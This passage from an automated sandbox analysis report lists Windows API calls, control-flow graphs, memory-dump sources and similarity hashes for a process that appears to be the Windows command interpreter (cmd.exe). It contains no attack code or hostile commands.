                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DBB
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DCA
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DE0
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DEE
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E04
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490589
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD49059E
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905AF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD4905C5
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905EF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD490605
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490632
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD490647
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                          • Part of subcall function 00007FF7CD494AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                          • Part of subcall function 00007FF7CD494AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD495554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7CD494E35), ref: 00007FF7CD4955DA
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495623
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495667
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD4956BE
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495702
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E35
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E81
                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F69
                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F95
                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FB0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FC1
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FD8
                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FF8
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495037
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49504B
                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950DF
                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950F2
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49510F
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495130
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49514A
                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495175
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                        • API String ID: 1049357271-3021193919
                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction ID: 84ee1871a17f2f0a977d3808aa3ffb817d6d8cbd0e53727e1156c100f72dfefc
                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction Fuzzy Hash: 8BC14121B0CA4296EA04BF52E814579F6A6FF89BA0FC48135DF2E43755FF3CA6458320

                                        Control-flow Graph

                                        control_flow_graph 732 7ff7cd493c24-7ff7cd493c61 733 7ff7cd493c67-7ff7cd493c99 call 7ff7cd48af14 call 7ff7cd48ca40 732->733 734 7ff7cd49ec5a-7ff7cd49ec5f 732->734 743 7ff7cd493c9f-7ff7cd493cb2 call 7ff7cd48b900 733->743 744 7ff7cd49ec97-7ff7cd49eca1 call 7ff7cd49855c 733->744 734->733 736 7ff7cd49ec65-7ff7cd49ec6a 734->736 738 7ff7cd49412e-7ff7cd49415b call 7ff7cd498f80 736->738 743->744 749 7ff7cd493cb8-7ff7cd493cbc 743->749 750 7ff7cd493cbf-7ff7cd493cc7 749->750 750->750 751 7ff7cd493cc9-7ff7cd493ccd 750->751 752 7ff7cd493cd2-7ff7cd493cd8 751->752 753 7ff7cd493ce5-7ff7cd493d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff7cd493cda-7ff7cd493cdf 752->754 756 7ff7cd493fb8 753->756 757 7ff7cd493d68-7ff7cd493d6c 753->757 754->753 755 7ff7cd493faa-7ff7cd493fb3 754->755 755->752 759 7ff7cd493fc6-7ff7cd493fec GetLastError call 7ff7cd49855c call 7ff7cd49a5d6 756->759 757->756 758 7ff7cd493d72-7ff7cd493dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7cd493dd3-7ff7cd493ddd 758->760 762 7ff7cd493ff1-7ff7cd494007 call 7ff7cd49855c _local_unwind 759->762 760->762 763 7ff7cd493de3-7ff7cd493dfb 760->763 774 7ff7cd49400c-7ff7cd494022 GetLastError 762->774 765 7ff7cd493e01-7ff7cd493e11 763->765 766 7ff7cd4940fe-7ff7cd494119 call 7ff7cd49855c _local_unwind 763->766 765->766 770 7ff7cd493e17-7ff7cd493e28 765->770 775 7ff7cd49411a-7ff7cd49412c call 7ff7cd48ff70 call 7ff7cd49855c 766->775 773 7ff7cd493e2c-7ff7cd493e34 770->773 773->773 776 7ff7cd493e36-7ff7cd493e3f 773->776 777 7ff7cd493e95-7ff7cd493e9c 774->777 778 7ff7cd494028-7ff7cd49402b 774->778 775->738 782 7ff7cd493e42-7ff7cd493e55 776->782 779 7ff7cd493ecf-7ff7cd493ed3 777->779 780 7ff7cd493e9e-7ff7cd493ec2 call 7ff7cd492978 777->780 778->777 783 7ff7cd494031-7ff7cd494047 call 7ff7cd49855c _local_unwind 778->783 785 7ff7cd493ed5-7ff7cd493ef7 GetFileAttributesW 779->785 786 7ff7cd493f08-7ff7cd493f0b 779->786 792 7ff7cd493ec7-7ff7cd493ec9 780->792 788 
7ff7cd493e66-7ff7cd493e8f GetFileAttributesW 782->788 789 7ff7cd493e57-7ff7cd493e60 782->789 799 7ff7cd49404c-7ff7cd494062 call 7ff7cd49855c _local_unwind 783->799 793 7ff7cd494067-7ff7cd494098 GetLastError call 7ff7cd49855c _local_unwind 785->793 794 7ff7cd493efd-7ff7cd493f02 785->794 796 7ff7cd493f0d-7ff7cd493f11 786->796 797 7ff7cd493f1e-7ff7cd493f40 SetCurrentDirectoryW 786->797 788->774 788->777 789->788 798 7ff7cd493f9d-7ff7cd493fa5 789->798 792->779 792->799 801 7ff7cd49409d-7ff7cd4940b3 call 7ff7cd49855c _local_unwind 793->801 794->786 794->801 803 7ff7cd493f13-7ff7cd493f1c 796->803 804 7ff7cd493f46-7ff7cd493f69 call 7ff7cd49498c 796->804 797->804 805 7ff7cd4940b8-7ff7cd4940de GetLastError call 7ff7cd49855c _local_unwind 797->805 798->782 799->793 801->805 803->797 803->804 815 7ff7cd4940e3-7ff7cd4940f9 call 7ff7cd49855c _local_unwind 804->815 816 7ff7cd493f6f-7ff7cd493f98 call 7ff7cd49417c 804->816 805->815 815->766 816->775
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                        • String ID: :
                                        • API String ID: 1809961153-336475711
                                        • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction ID: 429529aa4d0ebf8d1ce851f9278bb34ec020735cdf6d6dc2704783c09c140e57
                                        • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction Fuzzy Hash: 01D17D2270CB8191EA60AF16E4486B9F7A6FB85760F844135DF5E436A8FF3CE645CB10

                                        Control-flow Graph

                                        control_flow_graph 914 7ff7cd492394-7ff7cd492416 memset call 7ff7cd48ca40 917 7ff7cd49e0d2-7ff7cd49e0da call 7ff7cd494c1c 914->917 918 7ff7cd49241c-7ff7cd492453 GetModuleFileNameW call 7ff7cd49081c 914->918 924 7ff7cd49e0db-7ff7cd49e0ee call 7ff7cd49498c 917->924 923 7ff7cd492459-7ff7cd492468 call 7ff7cd49081c 918->923 918->924 929 7ff7cd49e0f4-7ff7cd49e107 call 7ff7cd49498c 923->929 930 7ff7cd49246e-7ff7cd49247d call 7ff7cd49081c 923->930 924->929 937 7ff7cd49e10d-7ff7cd49e123 929->937 935 7ff7cd492483-7ff7cd492492 call 7ff7cd49081c 930->935 936 7ff7cd492516-7ff7cd492529 call 7ff7cd49498c 930->936 935->937 947 7ff7cd492498-7ff7cd4924a7 call 7ff7cd49081c 935->947 936->935 940 7ff7cd49e13f-7ff7cd49e17a _wcsupr 937->940 941 7ff7cd49e125-7ff7cd49e139 wcschr 937->941 945 7ff7cd49e181-7ff7cd49e199 wcsrchr 940->945 946 7ff7cd49e17c-7ff7cd49e17f 940->946 941->940 944 7ff7cd49e27c 941->944 949 7ff7cd49e283-7ff7cd49e29b call 7ff7cd49498c 944->949 948 7ff7cd49e19c 945->948 946->948 956 7ff7cd49e2a1-7ff7cd49e2c3 _wcsicmp 947->956 957 7ff7cd4924ad-7ff7cd4924c5 call 7ff7cd493c24 947->957 951 7ff7cd49e1a0-7ff7cd49e1a7 948->951 949->956 951->951 954 7ff7cd49e1a9-7ff7cd49e1bb 951->954 958 7ff7cd49e1c1-7ff7cd49e1e6 954->958 959 7ff7cd49e264-7ff7cd49e277 call 7ff7cd491300 954->959 964 7ff7cd4924ca-7ff7cd4924db 957->964 962 7ff7cd49e1e8-7ff7cd49e1f1 958->962 963 7ff7cd49e21a 958->963 959->944 966 7ff7cd49e201-7ff7cd49e210 962->966 967 7ff7cd49e1f3-7ff7cd49e1f6 962->967 965 7ff7cd49e21d-7ff7cd49e21f 963->965 968 7ff7cd4924e9-7ff7cd492514 call 7ff7cd498f80 964->968 969 7ff7cd4924dd-7ff7cd4924e4 ??_V@YAXPEAX@Z 964->969 965->949 970 7ff7cd49e221-7ff7cd49e228 965->970 966->963 973 7ff7cd49e212-7ff7cd49e218 966->973 967->966 972 7ff7cd49e1f8-7ff7cd49e1ff 967->972 969->968 974 7ff7cd49e254-7ff7cd49e262 970->974 975 7ff7cd49e22a-7ff7cd49e231 970->975 972->966 972->967 973->965 974->944 977 7ff7cd49e234-7ff7cd49e237 975->977 977->974 978 
7ff7cd49e239-7ff7cd49e242 977->978 978->974 979 7ff7cd49e244-7ff7cd49e252 978->979 979->974 979->977
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                        • API String ID: 2622545777-4197029667
                                        • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction ID: cc76b106986b887df7b32274dd9022eca5032ce636882b52ebf2766c3929e07b
                                        • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction Fuzzy Hash: B4917F21B0DA4295EE24AF52D854AB8A3A6FF58B64FC44135CF6E47295FE3CE704C720

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID: CMD.EXE
                                        • API String ID: 1606018815-3025314500
                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction ID: 29a60f4e52564ba105571b9adc3b067fd57fdd59db2a4144ebf9c66fae0487ad
                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction Fuzzy Hash: DB41CC31B0DA02DBE604AF55E855578BBA1BB99771FC89179CF2E42360EF3DA604C620

                                        Control-flow Graph

                                        [Control-flow graph of the function starting at 7ff7cd48c620; the rendered graph (executed / not-executed block colouring) was not extracted. API calls reachable on its paths: GetConsoleTitleW, GetLastError, towupper, SetConsoleTitleW, wcsncmp, wcschr.]
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleTitlewcschr
                                        • String ID: /$:$C:\Users\user\Desktop
                                        • API String ID: 2364928044-1365500999
                                        • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                        • Instruction ID: 8f571fb85f9a1f73d9cef481c7cdf4a233d53ae82f206b9040e91fb5fa649a2a
                                        • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                        • Instruction Fuzzy Hash: 20C17E61B0C64281EA54BF16D814679E2A2EF90BB0FC45131DF6E872D5FF3CEA448720

                                        Control-flow Graph

                                        [Control-flow graph of the function starting at 7ff7cd498d80; the rendered graph (executed / not-executed block colouring) was not extracted. API calls reachable on its paths: Sleep, _amsg_exit, _initterm, exit, _cexit.]
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                        • String ID:
                                        • API String ID: 4291973834-0
                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction ID: 1ffb054e2dd3121d3e0774b0eddbd44d01c492bf22b47cf440d3cf454bdddd57
                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction Fuzzy Hash: 28412A21B0CA4392FA54BF56E854635F2A6AB64364F840475DF7E836A0FF3CEA408760

                                        Control-flow Graph

                                        [Control-flow graph of the function starting at 7ff7cd494a14; the rendered graph (executed / not-executed block colouring) was not extracted. API calls reachable on its paths: GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, memmove, FreeEnvironmentStringsW.]
                                        APIs
                                        • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                        • memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                        • String ID:
                                        • API String ID: 1623332820-0
                                        • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                        • Instruction ID: 9fcb93c2cd7292d546464a98fe52d482dbf1a45eb43bffc32bc547e889ee94d9
                                        • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                        • Instruction Fuzzy Hash: F4119421B19B5182DE10AF87B404039FBE5EB89FE0B899038DF5E03744EE3DE5418754

                                        Control-flow Graph

                                        APIs
                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD4AC9EE,?,?,?,00007FF7CD4AEA6C,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD495CCB
                                        • GetExitCodeProcess.KERNELBASE(?,?,00000000,00007FF7CD4AC9EE,?,?,?,00007FF7CD4AEA6C,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD495CDF
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7CD495D03
                                        • fprintf.MSVCRT ref: 00007FF7CD49F4A9
                                        • fflush.MSVCRT ref: 00007FF7CD49F4C2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                        • String ID:
                                        • API String ID: 1826527819-0
                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
